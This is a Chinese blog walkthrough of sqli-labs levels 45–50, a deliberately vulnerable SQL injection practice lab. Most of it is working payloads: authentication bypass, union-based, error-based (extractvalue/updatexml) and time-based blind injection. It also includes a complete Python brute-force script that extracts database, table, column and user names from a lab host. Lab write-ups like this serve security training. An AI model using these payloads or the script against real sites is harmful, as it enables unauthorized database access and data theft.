sqli-labs(9)

最新推荐文章于 2024-08-18 17:04:39 发布
最新推荐文章于 2024-08-18 17:04:39 发布
阅读量507 收藏
点赞数 11
分类专栏: 靶场 文章标签: 数据库 sql mysql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61988806/article/details/134707411
版权

45.

不会显示报错信息通过or 1验证

在密码处输入')or('1

登录成功

')union select 1,2,3 #

')union select 1,database(),3 #

')union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 #

')union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 #

')union select 1,(select group_concat(username) from security.users),3 #

46.

单双引号都报错’

后面是order by使用and 1=1 是验证不了的

1 and(extractvalue(1,concat(0x5c,database())))
1 and(updatexml(1,concat(0x7e,database(),0x7e),1))

1 and(extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))))
1 and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))

1 and(extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))))
1 and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))

1 and(extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))))
1 and(updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1))

47.

1'失败

1‘ --+成功

1“成功 

1'and(extractvalue(1,concat(0x5c,database()))) --+
1'and(updatexml(1,concat(0x7e,database(),0x7e),1)) --+

1'and(extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security')))) --+
1'and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)) --+

1'and(extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))) --+
1'and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)) --+

48.

发现页面无报错回显,这里还是order by 无法使用union

使用延时注入

1 and if(substr(database(),1,1)='s',sleep(2),0)

用脚本进行爆破

import requests,time

def database():
    database_name = ''
    charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    while True:
        for char in charset:
            payload = f"1 and if(substr(database(),{len (database_name) +1},1)='{char}',sleep(2),0) --+"
            url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
            start_time = time.time()
            rsp = requests.get(url)
            end_time = time.time()
            rsp.time = end_time - start_time
            if rsp.time >= 2:
                database_name += char
                print(f"数据库名称为:{database_name}")
                break
        else:
            break
    return database_name

datas = database()
print("最终数据库名称为:",datas)

1 and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)='e',sleep(2),0) --+
def tablename():
    table_name =''
    charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    while True:
        for char in charset:
            payload = f"1 and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),{len(table_name) +1},1)='{char}',sleep(2),0) --+"
            url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
            start_time = time.time()
            rsp = requests.get(url)
            end_time = time.time()
            rsp.time = end_time - start_time
            if rsp.time >= 2:
                table_name += char
                print(f"表名称为:{table_name}")
                break
        else:
            break
    return table_name

tables =  tablename()
print("最终表名称为:",tables)

1 and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,1)='i',sleep(2),0) --+
def columnname():
    column_name = ''
    charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    while True:
        for char in charset:
            payload = f"1 and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),{len(column_name) +1},1)='{char}',sleep(2),0) --+"
            url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
            start_time = time.time()
            rsp = requests.get(url)
            end_time = time.time()
            rsp.time = end_time - start_time
            if rsp.time >= 2:
                column_name += char
                print(f"列名称为:{column_name}")
                break
        else:
            break
    return column_name

columns = columnname()
print("最终列名称为:",columns)

1 and if(substr((select username from security.users limit 1,1),1,1)='a',sleep(2),0) --+
def datas():
    data  = ''
    charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    while True:
        for char in charset:
            payload = f"1 and if(substr((select username from security.users limit 1,1),{len(data) +1},1)='{char}',sleep(2),0) --+"
            url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
            start_time = time.time()
            rsp = requests.get(url) 
            end_time = time.time()  
            rsp.time = end_time - start_time    
            if rsp.time >= 2:
                data += char
                print(f"数据为:{data}")
                break
        else:
            break
    return data
das = datas()
print("最终数据为:",das)

完整的脚本

import requests,time

def database():
    database_name = ''
    charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    while True:
        for char in charset:
            payload = f"1 and if(substr(database(),{len (database_name) +1},1)='{char}',sleep(2),0) --+"
            url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
            start_time = time.time()
            rsp = requests.get(url)
            end_time = time.time()
            rsp.time = end_time - start_time
            if rsp.time >= 2:
                database_name += char
                print(f"数据库名称为:{database_name}")
                break
        else:
            break
    return database_name

datas = database()
print("最终数据库名称为:",datas)

         
def tablename():
    table_name =''
    charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    while True:
        for char in charset:
            payload = f"1 and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),{len(table_name) +1},1)='{char}',sleep(2),0) --+"
            url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
            start_time = time.time()
            rsp = requests.get(url)
            end_time = time.time()
            rsp.time = end_time - start_time
            if rsp.time >= 2:
                table_name += char
                print(f"表名称为:{table_name}")
                break
        else:
            break
    return table_name

tables =  tablename()
print("最终表名称为:",tables)

def columnname():
    column_name = ''
    charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    while True:
        for char in charset:
            payload = f"1 and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),{len(column_name) +1},1)='{char}',sleep(2),0) --+"
            url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
            start_time = time.time()
            rsp = requests.get(url)
            end_time = time.time()
            rsp.time = end_time - start_time
            if rsp.time >= 2:
                column_name += char
                print(f"列名称为:{column_name}")
                break
        else:
            break
    return column_name

columns = columnname()
print("最终列名称为:",columns)

def datas():
    data  = ''
    charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    while True:
        for char in charset:
            payload = f"1 and if(substr((select username from security.users limit 1,1),{len(data) +1},1)='{char}',sleep(2),0) --+"
            url = f'http://192.168.1.200:86/Less-48/?sort={payload}'
            start_time = time.time()
            rsp = requests.get(url) 
            end_time = time.time()  
            rsp.time = end_time - start_time    
            if rsp.time >= 2:
                data += char
                print(f"数据为:{data}")
                break
        else:
            break
    return data
das = datas()
print("最终数据为:",das)

49.

和上面比多了’

50.

1 and(extractvalue(1,concat(0x5c,database())))
1 and(updatexml(1,concat(0x7e,database(),0x7e),1))

1 and(extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))))
1 and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))

1 and(extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))))
1 and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))

1 and(extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))))
1 and(updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1))

许允er
关注
专栏目录
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1909
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs(9)
jimggg的博客
03-19 207
sqlmap跑了一跑,肯定比较麻烦,因为路的时间有点长,看结果 基于时间的盲注,用单引号闭合 在我们注入了SQL代码之后,存在以下两种情况: 如果注入的SQL代码不影响后台[数据库]的正常功能执行,那么Web应用的页面显示正确(原始页面)。 如果注入的SQL代码影响后台数据库的正常功能(产生了SQL注入),但是此时Web应用的页面依旧显示正常(原因是Web应用程序采取了“重定向”或“屏蔽”措施)...
sqli-labs靶场通关攻略(9-10关)
最新发布
Nai_zui_jiang的博客
08-18 1216
因为这里页面不会给我们回显任何信息(无论是正确还是错误页面都是那样),所以这里我们需要使用时间盲注来进行注入,通过延时请求数据,观察请求的时间是否延长,如果延长了那么就可以使用时间盲注。这里会用 if 和 sleep 进行判断if(布尔盲注语句, sleep(3),1) // if 判断语句,当布尔盲注语句成立时执行sleep(3),否则执行1。
sqli-labs 9
qq_55777983的博客
07-29 426
less -9 很快啊,我们来到了第9题 掌握了第8题的技巧,第九题其实就是在布尔盲注的基础上构造了能自己判断语句正确的能力而使用了sleep()函数 所以也叫延时注入 我们惊讶的发现原本应该报错的?id=1’都是这样的回显 尝试了很多只会回显 显然这题使得布尔型盲注都无法使用 所以我们使用延时注入来判断语句的对错 ?id=1’ and sleep(5) --+ 我们注入这样的语句,发现页面标签转了好久的圈圈差不多是五秒 由于我们的1’成功闭合前面–+又注释了后面 而and连接了前面正确的语句所以执行了后
SQL注入之sqli-labs(九)
m0_60716947的博客
04-30 333
目录 (九)第五十四关到六十五关 (1)第五十四关 (2)第五十五关 (3)第五十六关 (4)第五十七关 (5)第五十八关 (6)第五十九关 (7)第六十关 (8)第六十一关 (9)第六十二关 (10)第六十三关 (11)第六十四关 (12)第六十五关 (十)sqli-labs 总结 (九)第五十四关到六十五关 (1)第五十四关 首页提醒我们使用id 值进行注入,并且告诉我们: 此挑战的目标是在少于 10 次尝试的情况下仅从数据库随机表中转储(“挑战”)的(密钥) 为
sqli-labs第九关
qq_56726035的博客
04-08 731
sqli-labs第九关
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs(php7.3以上可运行)
01-29
sqli-labs提供了多种级别的SQL注入练习,适合初学者到高级安全专家。每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种技术和防御策略。 三、PHP...
sqli-labs-master.zip sql注入的学习靶机
01-18
sql注入的学习靶机,由于github经常挂,这里特提供大家下载。
Sqli-labs less 9
weixin_34049032的博客
08-11 173
Less-9 本关我们从标题就可以看到 《基于时间-单引号》,所以很明显的这关要我们利用延时注入进行,同时id参数进行的是 ' 的处理。这里我们大致的将延时注入的方法演示一次。 这里用sleep()函数。 这里因为我们利用的是时间的延迟,贴图就没有意义了,这里只写payload了:(正确的时候直接返回,不正确的时候等待5秒钟,只贴正确的) 猜测数据库: http://127.0.0.1/...
sqli-labs关卡9(基于get提交的单引号闭合的时间盲注)通关思路
zyh1588的博客
10-31 744
小白回顾sqli-labs靶场第九关(时间盲注)
SQLI-labs-第九关和第十关
weixin_54055099的博客
04-14 879
sqlilab 第9关和第10关,时间盲注
第九关的原理方法
2401_82770182的博客
04-22 165
第九关会发现我们不管输入什么页面显示的东西都是一样的,这个时候布尔盲注就不适合我们用,布尔盲注适合页面对于错误和正确结果有不同反应。判断所有字段名的长度。
sqli-labs less9详解
Brilliant_orange的博客
11-10 1416
【写在前面:建议:如果对SQL注入中SQL语句不熟悉的可以先看看如果看懂了这篇,这题就当应用了】
SQL注入——sqli-labs-Less-9时间盲注_sqliless9,解析底层原理
2401_84433486的博客
04-17 844
测得第一列的名称的第一个字符是“i”,同样类推,得到第一列名为“id”,第二列“username”第三列“password”然后,第二个表名的第一位是“r”,依此类推得到第二个表名“referers”,第三个“uagens”,第四个“users”手注是可以注出来,但是相当费时间,我认为,手注更大的意义在于理解方法。(img-qkVA1lLi-1713365620107)]测得第一个表名的第一位是“e”,递推下去得到表名:emails。止,不再深入研究,那么很难做到真正的技术提升。下面尝试注users表。
SQL注入——sqli-labs-Less-9时间盲注
m0_63563528的博客
04-06 647
时间盲注 和 Bool 盲注很像,区别就是 “参照物” 的不同
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相关知识。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

许允er

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值